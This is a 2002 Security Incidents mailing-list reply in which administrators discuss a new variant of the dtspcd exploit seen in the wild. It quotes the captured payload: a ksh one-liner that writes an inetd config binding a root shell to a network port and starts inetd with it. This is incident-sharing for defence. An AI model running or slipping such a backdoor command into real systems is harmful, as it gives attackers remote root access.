Security Incidents mailing list archives

Re: variation of the dtspcd exploit?

From: Valdis.Kletnieks () vt edu
Date: Thu, 14 Feb 2002 22:00:19 -0500

On Thu, 14 Feb 2002 16:07:10 EST, "Nathan W. Labadie" <ab0781 () wayne edu>  said:

Until last week, all the dtspcd exploits I'd seen had been the same
(inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
around.  The ASCII output looks something like this:

/bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
/usr/sbin/inetd -s /tmp/z;
sleep 10;


Hmm... hardly new.  Somebody's retrofitted a /tmp/bob onto a new delivery
vector, it looks like (though I've not check the capture)...
-- 
                                Valdis Kletnieks
                                Computer Systems Senior Engineer
                                Virginia Tech

Attachment: _bin
Description:

Current thread:

variation of the dtspcd exploit? Nathan W. Labadie (Feb 14)
- Re: variation of the dtspcd exploit? Valdis . Kletnieks (Feb 15)